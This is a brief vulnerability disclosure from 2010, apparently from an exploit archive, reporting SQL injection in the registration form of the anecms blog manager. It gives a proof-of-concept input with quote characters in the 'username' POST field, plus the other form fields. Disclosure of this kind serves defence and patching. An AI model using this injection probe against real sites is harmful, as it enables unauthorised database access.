############################################################################### Exploit Title: anecms SQli #### Date: 23/08/2010 #### Author: Sweet#### Contact : charif38@hotmail.fr#### Software Link: anecms.com### # Download: anecms.com/anecms.zip### # Version: All #### Tested on: WinXp sp3 ## Description : anecms is an open source blog manager# ##################################################################################
Sqli:
The POST variable username has been set to sweet'" on http://vulnerable.com/register/next
Poc:
http://www.example.com/register/next
username = Sweet'"
password = test
re password = test
email = charif38@hotmail.fr
then register :]
screen : http://img830.imageshack.us/img830/1213/anecm.jpg
Saha Ftourkoum et 1,2,3 viva L'Algerie :))
